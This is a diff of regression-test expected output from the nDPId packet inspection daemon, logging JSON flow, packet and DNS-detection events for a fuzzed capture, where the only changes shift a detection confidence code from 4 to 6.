00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1120470916873,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470916873,"pkt":"ADBUADRWAODtAW69CABFAABEa94AAIARS3fAqAECwKgBAQr7ADUAMMzBWAIAAAABqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916873,"flow_last_seen":1120470916873,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2811,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916873,"flow_last_seen":1120470916873,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2811,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed 
Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470916875,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1120470916875,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470916875,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqOkBwKgBAgA1CvsAR689eAKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470916875,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470916875,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":591,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470916876} 00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":591,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"thread_ts_msec":1120470916875,"pkt":"ADBUADRWAODtAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":592,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":3072,"global_ts_msec":1120470923515} 
@@ -1143,26 +1143,26 @@ 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1120470924263,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470924263,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa+EAAIARSmzAqAECwKgB\/wCJA4kAOltBhVoBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVIQ0FDQUNBQ0FDQUJNAAAgAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470949427,"flow_last_seen":1120470949427,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1120470949427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470949427,"pkt":"ADBUADRWAODtAW69CABFAABIa+MAAIARS27AqAECwKgBAQr8ADUANNjGUQIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3lhZXJjaXR5AmRrAAAhAAE="} 
-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470949427,"flow_last_seen":1120470949427,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyaercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470949427,"flow_last_seen":1120470949427,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyaercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":1120470950421,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470950421,"pkt":"ADBUADRWAODtAW49CABFAABIa+QAAIARS23AqAECwKgBAQr8ADUANNjGUZgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":596,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470949427,"flow_last_seen":1120470950421,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470950421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":596,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470949427,"flow_last_seen":1120470950421,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470950421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":3,"flow_last_seen":1120470952424,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470952424,"pkt":"ADBUADRWAODtAW69CABFAABIa+UAAIARS2zAqAECwKgBAQr8ADUANNjGUQIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":598,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470954427} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":598,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470952424,"pkt":"ADBUADRWAODtAW69CABFAABIa+YAEIARS6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1120470966440,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470966440,"pkt":"ADBUADRWAODtAW69CABFAABEa+gAAIARS23AqAECwKgBAQr9ADUAMIS+oAMAAAABAAAAAAAAATEBMAEwEzEyNwdpbi1hZGByBGFycGEAAAwAAQ=="} 
-00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127?in-ad_r?arpa???","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127?in-ad_r?arpa???","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":601,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470966442} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":601,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470966440,"pkt":"AJrtBW69ADBUADRWCABFAJFbeQBAAEARtz7AqAEBwKgBAgA1Cv0AR2c6oAOAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGTyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":602,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":822,"global_ts_msec":1120470966443} 01430{"packet_event_id":1,"packet_event_name":"packet","packet_id":602,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":856,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":856,"pkt_l4_len":0,"thread_ts_msec":1120470966440,"pkt":"ADBUADRWAODtAW69CABFAGtKa+kAAIARE\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"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966852,"flow_last_seen":1120470966852,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470966852,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1120470966852,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470966852,"pkt":"ADBUADR2AODtAW69CABFAABIa+sAAIARS2bAqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABF9zaXAEX3VkcAJzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966852,"flow_last_seen":1120470966852,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470966852,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966852,"flow_last_seen":1120470966852,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470966852,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": 
{"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":606,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470967846} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":606,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470966852,"pkt":"ADBUADRWAODtAW69CABFAABIa+yjAIARS2XAqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00195{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":607,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":0,"global_ts_msec":1120470969849} 
@@ -1171,119 +1171,119 @@ 00414{"packet_event_id":1,"packet_event_name":"packet","packet_id":608,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":0,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470966852,"pkt":"\/\/\/\/\/\/\/\/AODtAW69AABFAABOa+4AAIARSl\/AqAECwKgB\/wCJAIkAOlt8hV8BEAABAAAAAAAAIEVGRW9FSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQTVNAAAgAAE="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470971822,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1120470971822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470971822,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa+8AAIARSl7AqAECwKgBJXMAAIkAOls8hV8BEAABAAAAAAAAIUVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 
